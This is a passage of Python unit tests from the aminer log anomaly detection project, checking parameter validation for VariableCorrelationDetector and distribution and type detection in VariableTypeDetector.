match_disc_vals_sim_tresh=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 
match_disc_vals_sim_tresh=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=()) self.assertRaises(TypeError, 
VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, 
match_disc_distr_threshold=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=["SomethingElse"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=None) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=[]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=["Rel"]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=["WRel"]) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 
used_validate_cor_meth=["SomethingElse"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=None) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=[]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=["coverVals"]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=["distinctDistr"]) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 
validate_cor_distinct_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list="") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 
etd, ignore_list={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=["/model/path"]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=[]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=None) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list="") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=["/model/path"]) VariableCorrelationDetector(self.aminer_config, 
[self.stream_printer_event_handler], etd, constraint_list=[]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=None) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) 
self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list="") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["file:///tmp/syslog"]) logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/VariableTypeDetectorTest.py000066400000000000000000004170101500476301700311010ustar00rootroot00000000000000from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.analysis.VariableTypeDetector import VariableTypeDetector, convert_to_floats, consists_of_ints, consists_of_floats from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from 
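aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase
from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD
import time
import pickle
import random


class VariableTypeDetectorTest(TestBase):
    """Unittests for the VariableTypeDetector."""

    path = "path"

    @staticmethod
    def _shape_hits(detectors, data_list, iterations, dataset_size, shape, beta_index=None):
        """
        Feed consecutive slices of data_list to detect_continuous_shape and record, per slice and per detector, whether the
        expected distribution shape was reported.

        detectors: VariableTypeDetector instances queried in turn for every slice (the detectors are interleaved per slice,
        as the original test did, so a shared EventTypeDetector sees the same call order).
        data_list: flat sample list; slice i covers data_list[i * dataset_size:(i + 1) * dataset_size].
        iterations: number of slices to evaluate.
        dataset_size: number of values per slice.
        shape: distribution name expected in the result, e.g. "uni", "nor" or "beta".
        beta_index: for shape "beta" the expected variant (compared with the element at index -2 of the result); None otherwise.
        Returns one list of 1/0 flags per detector, in the order of detectors.
        """
        hits = [[] for _ in detectors]
        for i in range(iterations):
            for detector, detector_hits in zip(detectors, hits):
                # A fresh slice per call, so no detector can observe a list object handed to another one.
                distribution_list = detector.detect_continuous_shape(data_list[i * dataset_size:(i + 1) * dataset_size])
                # The searched shape counts as found if it is the primary result or appears among the alternative
                # distributions stored in the last element of the result.
                if beta_index is None:
                    found = distribution_list[0] == shape or shape in [distr[0] for distr in distribution_list[-1]]
                else:
                    variant = shape + str(beta_index)
                    found = (distribution_list[0] == shape and distribution_list[-2] == beta_index) or variant in [
                        distr[0] + str(distr[-1]) for distr in distribution_list[-1]]
                detector_hits.append(1 if found else 0)
        return hits

    def test1convert_to_floats(self):
        """This unittest tests possible inputs of the convert_to_floats function."""
        # use a list full of floats
        float_list = [11.123, 12.0, 13.55, 12.11]
        result = convert_to_floats(float_list)
        self.assertEqual(float_list, result, result)

        # use a list containing some floats and integers
        float_int_list = [11.123, 12, 13.55, 12.11, 120]
        result = convert_to_floats(float_int_list)
        self.assertEqual([11.123, 12.0, 13.55, 12.11, 120.0], result, result)

        # use a list of strings with float values
        string_float_list = ["11.123", "12.0", "13.55", b"12.11"]
        result = convert_to_floats(string_float_list)
        self.assertEqual(float_list, result, result)

        # use a list of strings with values being no floats
        string_no_float_list = ["11.123", "10:24 AM", "13.55", b"12.11"]
        result = convert_to_floats(string_no_float_list)
        self.assertFalse(result)

    def test2consists_of_ints(self):
        """This unittest tests possible inputs of the consists_of_ints function."""
        # use a list full of integers
        int_list = [11, 12, 27, 33, 190]
        self.assertTrue(consists_of_ints(int_list))

        # use a list containing integers and floats
        int_float_list = [11, 12, 27, 33.0, 190]
        self.assertTrue(consists_of_ints(int_float_list))

        # use a list containing integers and floats
        int_float_list = [11, 12, 27, 33.0, 190.2]
        self.assertFalse(consists_of_ints(int_float_list))

        # use a list with integers as strings
        string_int_list = ["11", "12", "27", "33", b"190"]
        self.assertFalse(consists_of_ints(string_int_list))

    def test3detect_continuous_shape_fixed_data(self):
        """
        This unittest tests possible continuously distributed variables raised by the detect_continuous_shape method. It uses fixed data sets.
        Every distribution has generated 20*100 Datasets and var_ev = 0, var_var = 1.
        """
        # Number of execution of the tested function
        iterations = 20
        # Size of the initial datasample
        dataset_size = 100
        # Significance level
        significance_niveau = 0.05

        # Fixture file, expected shape name and (for beta only) the expected variant index.
        # Every pickle holds [data_list, expected_hits_ks, expected_hits_cm].
        cases = [
            ("unit/data/vtd_data/uni_data_test3", "uni", None),
            ("unit/data/vtd_data/nor_data_test3", "nor", None),
            ("unit/data/vtd_data/beta1_data_test3", "beta", 1),
            ("unit/data/vtd_data/beta2_data_test3", "beta", 2),
            ("unit/data/vtd_data/beta3_data_test3", "beta", 3),
            ("unit/data/vtd_data/beta4_data_test3", "beta", 4),
            ("unit/data/vtd_data/beta5_data_test3", "beta", 5),
        ]
        # load data. pickle.load() executes code embedded in the file, so only repository-controlled fixtures may be read here.
        fixtures = []
        for fixture_path, shape, beta_index in cases:
            with open(fixture_path, "rb") as f:
                [data_list, result_shapes_ks, result_shapes_cm] = pickle.load(f)
            fixtures.append((data_list, result_shapes_ks, result_shapes_cm, shape, beta_index))

        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vtd_ks = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size, div_thres=0.5,
                                      test_gof_int=True, sim_thres=0.3, gof_alpha=significance_niveau, used_gof_test="KS")
        vtd_cm = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size, div_thres=0.5,
                                      test_gof_int=True, sim_thres=0.3, gof_alpha=significance_niveau, used_gof_test="CM")

        for data_list, result_shapes_ks, result_shapes_cm, shape, beta_index in fixtures:
            result_list_ks, result_list_cm = self._shape_hits([vtd_ks, vtd_cm], data_list, iterations, dataset_size, shape, beta_index)
            # Test if the result lists are correct; assertEqual shows the differing positions on failure.
            self.assertEqual(result_shapes_ks, result_list_ks)
            self.assertEqual(result_shapes_cm, result_list_cm)

    def test4detect_var_type(self): """This unittest tests possible scenarios of the detect_var_type method.""" # Load list of an uniformal distributed sample which consists of integers with open("unit/data/vtd_data/uni_data_test4", "rb") as f: uni_data_list_int = pickle.load(f) num_init = 100 etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test="KS") t = time.time() # test the "static" path of detect_var_type stat_data = b"5.3.0-55-generic" log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # check what happens if less than numMinAppearance values are available for i in range(num_init): self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) self.assertEqual(["stat", [stat_data.decode()], False], result) # reset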
etd and vtd for clear results. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test="KS") # test ascending with float values for i in range(num_init): stat_data = bytes(str(i * 0.1), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) self.assertEqual(["asc", "float"], result) # reset etd and vtd for clear results. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test="KS") # test ascending with integer values for i in range(num_init): stat_data = bytes(str(i), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) self.assertEqual(["asc", "int"], result) # reset etd and vtd for clear results. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test="KS") # test descending with float values for i in range(num_init, 0, -1): stat_data = bytes(str(i * 0.1), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) self.assertEqual(["desc", "float"], result) # reset etd and vtd for clear results. 
etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test="KS") # test descending with integer values for i in range(num_init, 0, -1): stat_data = bytes(str(i), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) self.assertEqual(["desc", "int"], result) # reset etd and vtd for clear results. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.3, test_gof_int=True, used_gof_test="KS") # test "num_init" and "div_thres" values = [] for i in range(num_init): stat_data = bytes(str(uni_data_list_int[i]), "utf-8") values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) # this means that the uniformal distribution must be detected. 
self.assertTrue(result[0] == "uni" or (isinstance(result[-1], list) and "uni" in [distr[0] for distr in result[-1]]), result) # test "divThres" option for the continuous distribution vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=1.0, test_gof_int=True, used_gof_test="KS") result = vtd.detect_var_type(0, 0) self.assertEqual(["unq", values], result) # test "testInt" option for the continuous distribution vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.3, test_gof_int=False, used_gof_test="KS") result = vtd.detect_var_type(0, 0) self.assertEqual(["unq", values], result) # test "simThres" option to result in "others" vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.5, test_gof_int=False, sim_thres=0.5, used_gof_test="KS") values = [] for i in range(100): stat_data = bytes(str((i % 50) * 0.1), "utf-8") values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) # at least (1 - "simThresh") * "numMinAppearance" and maximal "numMinAppearance" * "divThres" - 1 unique values must exist. 
self.assertEqual(["others", 0], result) # test discrete result vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.5, test_gof_int=False, sim_thres=0.3, used_gof_test="KS") values = [] for i in range(num_init): stat_data = bytes(str((i % 50) * 0.1), "utf-8") values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) values_set = list(set(values)) values_app = [0 for _ in range(len(values_set))] for value in values: values_app[values_set.index(value)] += 1 values_app = [x / len(values) for x in values_app] self.assertEqual(["d", values_set, values_app, len(values)], result) def test5consists_of_floats(self): """This unittest tests the consists_of_floats method.""" # test an empty list data_list = [] self.assertTrue(consists_of_floats(data_list)) # test a list of integers and floats data_list = [10, 11.12, 13, 177, 0.5, 0.] self.assertTrue(consists_of_floats(data_list)) # test a list containing a string data_list = [10, 11.12, 13, 177, 0.5, 0., "dd"] self.assertFalse(consists_of_floats(data_list)) # test a list containing bytes data_list = [10, 11.12, 13, 177, 0.5, 0., b"x"] self.assertFalse(consists_of_floats(data_list)) def test6receive_atom(self): """ This unittest tests if atoms are sorted to the right distribution and if the update steps also work properly. Therefore, the assumption that after 200 values the VTD with the default parameters can change to the right distribution. 
